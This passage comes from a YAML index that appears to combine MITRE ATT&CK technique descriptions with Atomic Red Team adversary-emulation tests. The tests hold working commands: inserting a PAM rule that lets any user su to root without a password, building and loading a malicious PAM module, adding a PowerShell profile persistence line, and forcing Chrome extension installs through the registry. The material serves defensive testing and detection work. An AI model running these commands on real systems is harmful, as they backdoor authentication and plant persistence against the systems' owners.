- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:20.077Z'
name: Boot or Logon Initialization Scripts
description: "Adversaries may use scripts automatically executed at boot or
logon initialization to establish persistence.(Citation: Mandiant APT29 Eye
Spy Email Nov 22)(Citation: Anomali Rocke March 2019) Initialization scripts
can be used to perform administrative functions, which may often execute other
programs or send information to an internal logging server. These scripts
can vary based on operating system and whether applied locally or remotely.
\ \n\nAdversaries may use these scripts to maintain persistence on a single
system. Depending on the access configuration of the logon scripts, either
local credentials or an administrator account may be necessary. \n\nAn adversary
may also be able to escalate their privileges since some boot or logon initialization
scripts run with higher privileges."
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- macOS
- Windows
- Linux
- Network Devices
- ESXi
x_mitre_version: '2.4'
atomic_tests: []
T1556.003:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771
created: '2020-06-26T04:01:09.648Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1556/003
external_id: T1556.003
- source_name: Apple PAM
description: Apple. (2011, May 11). PAM - Pluggable Authentication Modules.
Retrieved June 25, 2020.
url: https://opensource.apple.com/source/dovecot/dovecot-239/dovecot/doc/wiki/PasswordDatabase.PAM.txt
- source_name: Man Pam_Unix
description: die.net. (n.d.). pam_unix(8) - Linux man page. Retrieved June
25, 2020.
url: https://linux.die.net/man/8/pam_unix
- source_name: PAM Creds
description: Fernández, J. M. (2018, June 27). Exfiltrating credentials via
PAM backdoors & DNS requests. Retrieved November 17, 2024.
url: https://web.archive.org/web/20240303094335/https://x-c3ll.github.io/posts/PAM-backdoor-DNS/
- source_name: Red Hat PAM
description: Red Hat. (n.d.). CHAPTER 2. USING PLUGGABLE AUTHENTICATION MODULES
(PAM). Retrieved June 25, 2020.
url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/managing_smart_cards/pluggable_authentication_modules
- source_name: PAM Backdoor
description: zephrax. (2018, August 3). linux-pam-backdoor. Retrieved June
25, 2020.
url: https://github.com/zephrax/linux-pam-backdoor
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:21.118Z'
name: 'Modify Authentication Process: Pluggable Authentication Modules'
description: |-
Adversaries may modify pluggable authentication modules (PAM) to access user credentials or enable otherwise unwarranted access to accounts. PAM is a modular system of configuration files, libraries, and executable files which guide authentication for many services. The most common authentication module is pam_unix.so, which retrieves, sets, and verifies account authentication information in /etc/passwd and /etc/shadow.(Citation: Apple PAM)(Citation: Man Pam_Unix)(Citation: Red Hat PAM)
Adversaries may modify components of the PAM system to create backdoors. PAM components, such as pam_unix.so, can be patched to accept arbitrary adversary supplied values as legitimate credentials.(Citation: PAM Backdoor)
Malicious modifications to the PAM system may also be abused to steal credentials. Adversaries may infect PAM resources with code to harvest user credentials, since the values exchanged with PAM components may be plain-text since PAM does not store passwords.(Citation: PAM Creds)(Citation: Apple PAM)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Scott Knight, @sdotknight, VMware Carbon Black
- George Allen, VMware Carbon Black
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Linux
- macOS
x_mitre_version: '2.1'
identifier: T1556.003
atomic_tests:
- name: Malicious PAM rule
auto_generated_guid: 4b9dde80-ae22-44b1-a82a-644bf009eb9c
description: |
Inserts a rule into a PAM config and then tests it.
Upon successful execution, this test will insert a rule that allows every user to su to root without a password.
supported_platforms:
- linux
input_arguments:
path_to_pam_conf:
description: PAM config file to modify.
type: string
default: "/etc/pam.d/su-l"
pam_rule:
description: Rule to add to the PAM config.
type: string
default: auth sufficient pam_succeed_if.so uid >= 0
index:
description: Index where the rule is inserted.
type: integer
default: 1
executor:
name: sh
elevation_required: true
command: 'sudo sed -i "#{index}s,^,#{pam_rule}\n,g" #{path_to_pam_conf}
'
cleanup_command: 'sudo sed -i "\,#{pam_rule},d" #{path_to_pam_conf}
'
- name: Malicious PAM rule (freebsd)
auto_generated_guid: b17eacac-282d-4ca8-a240-46602cf863e3
description: |
Inserts a rule into a PAM config and then tests it.
Upon successful execution, this test will insert a rule that allows every user to su to root without a password.
supported_platforms:
- linux
input_arguments:
path_to_pam_conf:
description: PAM config file to modify.
type: string
default: "/etc/pam.d/su"
pam_rule:
description: Rule to add to the PAM config.
type: string
default: auth sufficient pam_succeed_if.so uid >= 0
index:
description: Index where the rule is inserted.
type: integer
default: 8
executor:
name: sh
elevation_required: true
command: 'sudo sed -i "" "#{index}s,^,#{pam_rule}\n,g" #{path_to_pam_conf}
'
cleanup_command: 'sudo sed -i "" "/#{pam_rule}/d" #{path_to_pam_conf}
'
- name: Malicious PAM module
auto_generated_guid: 65208808-3125-4a2e-8389-a0a00e9ab326
description: |
Creates a PAM module, inserts a rule to use it, and then tests it.
Upon successful execution, this test will create a PAM module that allows every user to su to root without a password.
supported_platforms:
- linux
input_arguments:
path_to_pam_conf:
description: PAM config file to modify.
type: string
default: "/etc/pam.d/su-l"
pam_rule:
description: Rule to add to the PAM config.
type: string
default: auth sufficient /tmp/pam_evil.so
index:
description: Index where the rule is inserted.
type: integer
default: 1
path_to_pam_module_source:
description: Path to PAM module source code.
type: path
default: PathToAtomicsFolder/T1556.003/src/pam_evil.c
path_to_pam_module:
description: Path to PAM module object
type: path
default: "/tmp/pam_evil.so"
dependencies:
- description: 'The PAM development library must be installed to build the PAM
module
'
prereq_command: 'if [ -f /usr/include/security/pam_modules.h ]; then exit
0; else exit 1; fi;
'
get_prereq_command: 'if [ -n "`which apt-get`" ]; then sudo apt-get -y install
libpam0g-dev; elif [ -n "`which yum`" ]; then sudo yum -y install pam-devel;
fi
'
- description: 'The PAM module must exist on disk at specified location (#{path_to_pam_module})
'
prereq_command: 'if [ -f #{path_to_pam_module} ]; then exit 0; else exit 1;
fi;
'
get_prereq_command: 'sudo gcc -shared -fPIC -o #{path_to_pam_module} #{path_to_pam_module_source}
'
executor:
name: sh
elevation_required: true
command: 'sudo sed -i "#{index}s,^,#{pam_rule}\n,g" #{path_to_pam_conf}
'
cleanup_command: 'sudo sed -i "\,#{pam_rule},d" #{path_to_pam_conf}
'
T1574.007:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--0c2d00da-7742-49e7-9928-4514e5075d32
created: '2020-03-13T14:10:43.424Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1574/007
external_id: T1574.007
- source_name: Elastic Rules macOS launchctl 2022
description: Elastic Security 7.17. (2022, February 1). Modification of Environment
Variable via Launchctl. Retrieved September 28, 2023.
url: https://www.elastic.co/guide/en/security/7.17/prebuilt-rule-7-16-4-modification-of-environment-variable-via-launchctl.html
- source_name: ExpressVPN PATH env Windows 2021
description: 'ExpressVPN Security Team. (2021, November 16). Cybersecurity
lessons: A PATH vulnerability in Windows. Retrieved September 28, 2023.'
url: https://www.expressvpn.com/blog/cybersecurity-lessons-a-path-vulnerability-in-windows/
- source_name: uptycs Fake POC linux malware 2023
description: 'Nischay Hegde and Siddartha Malladi. (2023, July 12). PoC Exploit:
Fake Proof of Concept with Backdoor Malware. Retrieved September 28, 2023.'
url: https://www.uptycs.com/blog/new-poc-exploit-backdoor-malware
- source_name: nixCraft macOS PATH variables
description: Vivek Gite. (2023, August 22). MacOS – Set / Change $PATH Variable
Command. Retrieved September 28, 2023.
url: https://www.cyberciti.biz/faq/appleosx-bash-unix-change-set-path-environment-variable/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:22.736Z'
name: Path Interception by PATH Environment Variable
description: "Adversaries may execute their own malicious payloads by hijacking
environment variables used to load libraries. The PATH environment variable
contains a list of directories (User and System) that the OS searches sequentially
through in search of the binary that was called from a script or the command
line. \n\nAdversaries can place a malicious program in an earlier entry in
the list of directories stored in the PATH environment variable, resulting
in the operating system executing the malicious binary rather than the legitimate
binary when it searches sequentially through that PATH listing.\n\nFor example,
on Windows if an adversary places a malicious program named \"net.exe\" in
`C:\\example path`, which by default precedes `C:\\Windows\\system32\\net.exe`
in the PATH environment variable, when \"net\" is executed from the command-line
the `C:\\example path` will be called instead of the system's legitimate executable
at `C:\\Windows\\system32\\net.exe`. Some methods of executing a program rely
on the PATH environment variable to determine the locations that are searched
when the path for the program is not given, such as executing programs from
a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059).(Citation:
ExpressVPN PATH env Windows 2021)\n\nAdversaries may also directly modify
the $PATH variable specifying the directories to be searched. An adversary
can modify the `$PATH` variable to point to a directory they have write access.
When a program using the $PATH variable is called, the OS searches the specified
directory and executes the malicious binary. On macOS, this can also be performed
through modifying the $HOME variable. These variables can be modified using
the command-line, launchctl, [Unix Shell Configuration Modification](https://attack.mitre.org/techniques/T1546/004),
or modifying the `/etc/paths.d` folder contents.(Citation: uptycs Fake POC
linux malware 2023)(Citation: nixCraft macOS PATH variables)(Citation: Elastic
Rules macOS launchctl 2022)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: defense-evasion
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Stefan Kanthak
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- macOS
- Linux
x_mitre_version: '1.2'
atomic_tests: []
T1546.013:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--0f2c410d-d740-4ed9-abb1-b8f4a7faf6c3
created: '2020-01-24T15:11:02.758Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1546/013
external_id: T1546.013
- source_name: Wits End and Shady PowerShell Profiles
description: 'DeRyke, A.. (2019, June 7). Lab Notes: Persistence and Privilege
Elevation using the Powershell Profile. Retrieved July 8, 2019.'
url: https://witsendandshady.blogspot.com/2019/06/lab-notes-persistence-and-privilege.html
- source_name: ESET Turla PowerShell May 2019
description: Faou, M. and Dumont R.. (2019, May 29). A dive into Turla PowerShell
usage. Retrieved June 14, 2019.
url: https://www.welivesecurity.com/2019/05/29/turla-powershell-usage/
- source_name: Malware Archaeology PowerShell Cheat Sheet
description: Malware Archaeology. (2016, June). WINDOWS POWERSHELL LOGGING
CHEAT SHEET - Win 7/Win 2008 or later. Retrieved June 24, 2016.
url: http://www.malwarearchaeology.com/s/Windows-PowerShell-Logging-Cheat-Sheet-ver-June-2016-v2.pdf
- source_name: Microsoft About Profiles
description: Microsoft. (2017, November 29). About Profiles. Retrieved June
14, 2019.
url: https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_profiles?view=powershell-6
- source_name: Microsoft Profiles
description: Microsoft. (2021, September 27). about_Profiles. Retrieved February
4, 2022.
url: https://docs.microsoft.com/powershell/module/microsoft.powershell.core/about/about_profiles
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:24.124Z'
name: 'Event Triggered Execution: PowerShell Profile'
description: "Adversaries may gain persistence and elevate privileges by executing
malicious content triggered by PowerShell profiles. A PowerShell profile (profile.ps1)
is a script that runs when [PowerShell](https://attack.mitre.org/techniques/T1059/001)
starts and can be used as a logon script to customize user environments.\n\n[PowerShell](https://attack.mitre.org/techniques/T1059/001)
supports several profiles depending on the user or host program. For example,
there can be different profiles for [PowerShell](https://attack.mitre.org/techniques/T1059/001)
host programs such as the PowerShell console, PowerShell ISE or Visual Studio
Code. An administrator can also configure a profile that applies to all users
and host programs on the local computer. (Citation: Microsoft About Profiles)
\n\nAdversaries may modify these profiles to include arbitrary commands, functions,
modules, and/or [PowerShell](https://attack.mitre.org/techniques/T1059/001)
drives to gain persistence. Every time a user opens a [PowerShell](https://attack.mitre.org/techniques/T1059/001)
session the modified script will be executed unless the -NoProfile
flag is used when it is launched. (Citation: ESET Turla PowerShell May 2019)
\n\nAn adversary may also be able to escalate privileges if a script in a
PowerShell profile is loaded and executed by an account with higher privileges,
such as a domain administrator. (Citation: Wits End and Shady PowerShell Profiles)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: persistence
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Allen DeRyke, ICE
- Matt Green, @mgreen27
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.2'
identifier: T1546.013
atomic_tests:
- name: Append malicious start-process cmdlet
auto_generated_guid: '090e5aa5-32b6-473b-a49b-21e843a56896'
description: 'Appends a start process cmdlet to the current user''s powershell
profile pofile that points to a malicious executable. Upon execution, calc.exe
will be launched.
'
supported_platforms:
- windows
input_arguments:
exe_path:
description: Path the malicious executable
type: path
default: calc.exe
ps_profile:
description: Powershell profile to use
type: string
default: "$profile"
dependency_executor_name: powershell
dependencies:
- description: 'Ensure a powershell profile exists for the current user
'
prereq_command: 'if (Test-Path #{ps_profile}) {exit 0} else {exit 1}
'
get_prereq_command: 'New-Item -Path #{ps_profile} -Type File -Force
'
executor:
command: |
Add-Content #{ps_profile} -Value ""
Add-Content #{ps_profile} -Value "Start-Process #{exe_path}"
powershell -Command exit
cleanup_command: |
$oldprofile = cat $profile | Select-Object -skiplast 1
Set-Content $profile -Value $oldprofile
name: powershell
T1543:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--106c0cf6-bf73-4601-9aa8-0945c2715ec5
created: '2020-01-10T16:03:18.865Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1543
external_id: T1543
- source_name: AppleDocs Launch Agent Daemons
description: Apple. (n.d.). Creating Launch Daemons and Agents. Retrieved
July 10, 2017.
url: https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLaunchdJobs.html
- source_name: TechNet Services
description: Microsoft. (n.d.). Services. Retrieved June 7, 2016.
url: https://technet.microsoft.com/en-us/library/cc772408.aspx
- source_name: OSX Malware Detection
description: 'Patrick Wardle. (2016, February 29). Let''s Play Doctor: Practical
OS X Malware Detection & Analysis. Retrieved November 17, 2024.'
url: https://papers.put.as/papers/macosx/2016/RSA_OSX_Malware.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:24.896Z'
name: Create or Modify System Process
description: "Adversaries may create or modify system-level processes to repeatedly
execute malicious payloads as part of persistence. When operating systems
boot up, they can start processes that perform background system functions.
On Windows and Linux, these system processes are referred to as services.(Citation:
TechNet Services) On macOS, launchd processes known as [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)
and [Launch Agent](https://attack.mitre.org/techniques/T1543/001) are run
to finish system initialization and load user specific parameters.(Citation:
AppleDocs Launch Agent Daemons) \n\nAdversaries may install new services,
daemons, or agents that can be configured to execute at startup or a repeatable
interval in order to establish persistence. Similarly, adversaries may modify
existing services, daemons, or agents to achieve the same effect. \n\nServices,
daemons, or agents may be created with administrator privileges but executed
under root/SYSTEM privileges. Adversaries may leverage this functionality
to create or modify system processes in order to escalate privileges.(Citation:
OSX Malware Detection) "
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- macOS
- Linux
- Containers
x_mitre_version: '1.2'
atomic_tests: []
T1133:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--10d51417-ee35-4589-b1ff-b6df1c334e8d
created: '2017-05-31T21:31:44.421Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1133
external_id: T1133
- source_name: Volexity Virtual Private Keylogging
description: 'Adair, S. (2015, October 7). Virtual Private Keylogging: Cisco
Web VPNs Leveraged for Access and Persistence. Retrieved March 20, 2017.'
url: https://www.volexity.com/blog/2015/10/07/virtual-private-keylogging-cisco-web-vpns-leveraged-for-access-and-persistence/
- source_name: MacOS VNC software for Remote Desktop
description: Apple Support. (n.d.). Set up a computer running VNC software
for Remote Desktop. Retrieved August 18, 2021.
url: https://support.apple.com/guide/remote-desktop/set-up-a-computer-running-vnc-software-apdbed09830/mac
- source_name: Unit 42 Hildegard Malware
description: 'Chen, J. et al. (2021, February 3). Hildegard: New TeamTNT Cryptojacking
Malware Targeting Kubernetes. Retrieved April 5, 2021.'
url: https://unit42.paloaltonetworks.com/hildegard-malware-teamtnt/
- source_name: Russian threat actors dig in, prepare to seize on war fatigue
description: Microsoft Threat Intelligence. (2023, December 7). Russian threat
actors dig in, prepare to seize on war fatigue. Retrieved June 18, 2025.
url: https://www.microsoft.com/en-us/security/security-insider/intelligence-reports/russian-threat-actors-dig-in-prepare-to-seize-on-war-fatigue
- source_name: The BadPilot campaign
description: 'Microsoft Threat Intelligence. (2025, February 12). The BadPilot
campaign: Seashell Blizzard subgroup conducts multiyear global access operation.
Retrieved June 18, 2025.'
url: https://www.microsoft.com/en-us/security/blog/2025/02/12/the-badpilot-campaign-seashell-blizzard-subgroup-conducts-multiyear-global-access-operation/?ref=thestack.technology
- source_name: Trend Micro Exposed Docker Server
description: Remillano II, A., et al. (2020, June 20). XORDDoS, Kaiji Variants
Target Exposed Docker Servers. Retrieved April 5, 2021.
url: https://www.trendmicro.com/en_us/research/20/f/xorddos-kaiji-botnet-malware-variants-target-exposed-docker-servers.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:24.982Z'
name: External Remote Services
description: |-
Adversaries may leverage external-facing remote services to initially access and/or persist within a network. Remote services such as VPNs, Citrix, and other access mechanisms allow users to connect to internal enterprise network resources from external locations. There are often remote service gateways that manage connections and credential authentication for these services. Services such as [Windows Remote Management](https://attack.mitre.org/techniques/T1021/006) and [VNC](https://attack.mitre.org/techniques/T1021/005) can also be used externally.(Citation: MacOS VNC software for Remote Desktop)
Access to [Valid Accounts](https://attack.mitre.org/techniques/T1078) to use the service is often a requirement, which could be obtained through credential pharming or by obtaining the credentials from users after compromising the enterprise network.(Citation: Volexity Virtual Private Keylogging) Access to remote services may be used as a redundant or persistent access mechanism during an operation.
Access may also be gained through an exposed service that doesn’t require authentication. In containerized environments, this may include an exposed Docker API, Kubernetes API server, kubelet, or web application such as the Kubernetes dashboard.(Citation: Trend Micro Exposed Docker Server)(Citation: Unit 42 Hildegard Malware)
Adversaries may also establish persistence on network by configuring a Tor hidden service on a compromised system. Adversaries may utilize the tool `ShadowLink` to facilitate the installation and configuration of the Tor hidden service. Tor hidden service is then accessible via the Tor network because `ShadowLink` sets up a .onion address on the compromised system. `ShadowLink` may be used to forward any inbound connections to RDP, allowing the adversaries to have remote access.(Citation: The BadPilot campaign) Adversaries may get `ShadowLink` to persist on a system by masquerading it as an MS Defender application.(Citation: Russian threat actors dig in, prepare to seize on war fatigue)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: initial-access
x_mitre_attack_spec_version: 3.3.0
x_mitre_contributors:
- ExtraHop
- David Fiser, @anu4is, Trend Micro
- Alfredo Oliveira, Trend Micro
- Idan Frimark, Cisco
- Rory McCune, Aqua Security
- Yuval Avrahami, Palo Alto Networks
- Jay Chen, Palo Alto Networks
- Brad Geesaman, @bradgeesaman
- Magno Logan, @magnologan, Trend Micro
- Ariel Shuper, Cisco
- Yossi Weizman, Azure Defender Research Team
- Vishwas Manral, McAfee
- Daniel Oakley
- Travis Smith, Tripwire
- David Tayouri
- Liran Ravich, CardinalOps
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Containers
- Linux
- macOS
- Windows
x_mitre_version: '2.5'
identifier: T1133
atomic_tests:
- name: Running Chrome VPN Extensions via the Registry 2 vpn extension
auto_generated_guid: 4c8db261-a58b-42a6-a866-0a294deedde4
description: 'Running Chrome VPN Extensions via the Registry install 2 vpn extension,
please see "T1133\src\list of vpn extension.txt" to view complete list
'
supported_platforms:
- windows
input_arguments:
chrome_url:
description: chrome installer download URL
type: url
default: https://dl.google.com/tag/s/appguid%3D%7B8A69D345-D564-463C-AFF1-A69D9E530F96%7D%26iid%3D%7BFD62DDBC-14C6-20BD-706F-C7744738E422%7D%26lang%3Den%26browser%3D3%26usagestats%3D0%26appname%3DGoogle%2520Chrome%26needsadmin%3Dprefers%26ap%3Dx64-stable-statsdef_1%26installdataindex%3Dempty/chrome/install/ChromeStandaloneSetup64.exe
extension_id:
description: chrome extension id
type: string
default: '"fcfhplploccackoneaefokcmbjfbkenj", "fdcgdnkidjaadafnichfpabhfomcebme"
'
dependency_executor_name: powershell
dependencies:
- description: 'Chrome must be installed
'
prereq_command: if ((Test-Path "C:\Program Files\Google\Chrome\Application\chrome.exe")
-Or (Test-Path "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe"))
{exit 0} else {exit 1}
get_prereq_command: |
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest -OutFile "PathToAtomicsFolder\..\ExternalPayloads\ChromeStandaloneSetup64.exe" #{chrome_url}
Start-Process "PathToAtomicsFolder\..\ExternalPayloads\ChromeStandaloneSetup64.exe" /S
executor:
name: powershell
elevation_required: true
command: |
$extList = #{extension_id}
foreach ($extension in $extList) {
New-Item -Path HKLM:\Software\Wow6432Node\Google\Chrome\Extensions\$extension -Force
New-ItemProperty -Path "HKLM:\Software\Wow6432Node\Google\Chrome\Extensions\$extension" -Name "update_url" -Value "https://clients2.google.com/service/update2/crx" -PropertyType "String" -Force}
Start chrome
Start-Sleep -Seconds 30
Stop-Process -Name "chrome"
cleanup_command: |
$extList = #{extension_id}
foreach ($extension in $extList) {
Remove-Item -Path "HKLM:\Software\Wow6432Node\Google\Chrome\Extensions\$extension" -ErrorAction Ignore}
T1546.006:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--10ff21b9-5a01-4268-a1b5-3b55015f1847
created: '2020-01-24T14:21:52.750Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1546/006
external_id: T1546.006
- source_name: Malware Persistence on OS X
description: Patrick Wardle. (2015). Malware Persistence on OS X Yosemite.
Retrieved July 10, 2017.
url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf
- source_name: Writing Bad Malware for OSX
description: Patrick Wardle. (2015). Writing Bad @$$ Malware for OS X. Retrieved
July 10, 2017.
url: https://www.blackhat.com/docs/us-15/materials/us-15-Wardle-Writing-Bad-A-Malware-For-OS-X.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:25.182Z'
name: LC_LOAD_DYLIB Addition
description: |-
Adversaries may establish persistence by executing malicious content triggered by the execution of tainted binaries. Mach-O binaries have a series of headers that are used to perform certain operations when a binary is loaded. The LC_LOAD_DYLIB header in a Mach-O binary tells macOS and OS X which dynamic libraries (dylibs) to load during execution time. These can be added ad-hoc to the compiled binary as long as adjustments are made to the rest of the fields and dependencies.(Citation: Writing Bad Malware for OSX) There are tools available to perform these changes.
Adversaries may modify Mach-O binary headers to load and execute malicious dylibs every time the binary is executed. Although any changes will invalidate digital signatures on binaries because the binary is being modified, this can be remediated by simply removing the LC_CODE_SIGNATURE command from the binary so that the signature isn’t checked at load time.(Citation: Malware Persistence on OS X)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: persistence
x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- macOS
x_mitre_version: '1.1'
atomic_tests: []
T1053.007:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--1126cab1-c700-412f-a510-61f4937bb096
created: '2021-03-29T17:06:22.247Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1053/007
external_id: T1053.007
- source_name: Kubernetes CronJob
description: The Kubernetes Authors. (n.d.). Kubernetes CronJob. Retrieved
March 29, 2021.
url: https://kubernetes.io/docs/concepts/workloads/controllers/cron-jobs/
- source_name: Kubernetes Jobs
description: The Kubernetes Authors. (n.d.). Kubernetes Jobs. Retrieved March
30, 2021.
url: https://kubernetes.io/docs/concepts/workloads/controllers/job/
- source_name: Threat Matrix for Kubernetes
description: Weizman, Y. (2020, April 2). Threat Matrix for Kubernetes. Retrieved
March 30, 2021.
url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:25.363Z'
name: Kubernetes Cronjob
description: |-
Adversaries may abuse task scheduling functionality provided by container orchestration tools such as Kubernetes to schedule deployment of containers configured to execute malicious code. Container orchestration jobs run these automated tasks at a specific date and time, similar to cron jobs on a Linux system. Deployments of this type can also be configured to maintain a quantity of containers over time, automating the process of maintaining persistence within a cluster.
In Kubernetes, a CronJob may be used to schedule a Job that runs one or more containers to perform specific tasks.(Citation: Kubernetes Jobs)(Citation: Kubernetes CronJob) An adversary therefore may utilize a CronJob to schedule deployment of a Job that executes malicious code in various nodes within a cluster.(Citation: Threat Matrix for Kubernetes)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: execution
- kill_chain_name: mitre-attack
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Center for Threat-Informed Defense (CTID)
- Vishwas Manral, McAfee
- Yossi Weizman, Azure Defender Research Team
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Containers
x_mitre_version: '1.4'
identifier: T1053.007
atomic_tests:
- name: ListCronjobs
auto_generated_guid: ddfb0bc1-3c3f-47e9-a298-550ecfefacbd
description: 'Kubernetes Job is a controller that creates one or more pods and
ensures that a specified number of them successfully terminate. Kubernetes
Job can be used to run containers that perform finite tasks for batch jobs.
Kubernetes CronJob is used to schedule Jobs. Attackers may use Kubernetes
CronJob for scheduling execution of malicious code that would run as a container
in the cluster.
'
supported_platforms:
- containers
input_arguments:
namespace:
description: K8s namespace to list
type: string
default: default
dependencies:
- description: 'kubectl must be installed
'
get_prereq_command: 'echo "kubectl must be installed manually"
'
prereq_command: 'which kubectl
'
executor:
command: 'kubectl get cronjobs -n #{namespace}
'
name: bash
elevation_required: false
- name: CreateCronjob
auto_generated_guid: f2fa019e-fb2a-4d28-9dc6-fd1a9b7f68c3
description: 'Kubernetes Job is a controller that creates one or more pods and
ensures that a specified number of them successfully terminate. Kubernetes
Job can be used to run containers that perform finite tasks for batch jobs.
Kubernetes CronJob is used to schedule Jobs. Attackers may use Kubernetes
CronJob for scheduling execution of malicious code that would run as a container
in the cluster.
'
supported_platforms:
- containers
input_arguments:
namespace:
description: K8s namespace to list
type: string
default: default
dependencies:
- description: 'kubectl must be installed
'
get_prereq_command: 'echo "kubectl must be installed manually"
'
prereq_command: 'which kubectl
'
executor:
command: 'kubectl create -f src/cronjob.yaml -n #{namespace}
'
cleanup_command: 'kubectl delete cronjob art -n #{namespace}
'
name: bash
elevation_required: false
T1542.001:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--16ab6452-c3c1-497c-a47d-206018ca1ada
